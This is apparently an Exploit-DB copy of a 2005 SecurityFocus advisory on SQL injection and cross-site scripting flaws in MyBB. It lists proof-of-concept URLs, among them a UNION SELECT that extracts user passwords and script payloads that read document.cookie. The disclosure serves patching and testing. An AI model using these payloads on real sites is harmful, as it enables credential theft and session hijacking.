MyBB Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

vendor:

MyBB

by:

SecurityFocus

7.5

CVSS

HIGH

Cross-Site Scripting and SQL Injection

89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89

CWE

Product Name: MyBB

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

MyBB Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

MyBB is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The application is prone to multiple SQL injection vulnerabilities. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. The application is also prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious SQL code. Additionally, input validation should be used to ensure that user-supplied data does not include malicious HTML or script code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13827/info

MyBB is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

The application is prone to multiple SQL injection vulnerabilities. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

The application is also prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*
http://www.example.com/mybb/online.php?pidsql=)[sql_query]
http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
http://www.example.com/mybb/editpost.php?pid='[sql_query]
http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
http://www.example.com/mybb/newreply.php?tid='[sql_query]
http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
http://www.example.com/mybb/showthread.php?tid='[sql_query]
http://www.example.com/mybb/showthread.php?pid='[sql_query]
http://www.example.com/mybb/usercp2.php?tid='[sql_query]
http://www.example.com/mybb/printthread.php?tid='[sql_query]
http://www.example.com/mybb/reputation.php?pid='[sql_query]
http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
http://www.example.com/mybb/ratethread.php?tid='[sql_query]

http://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E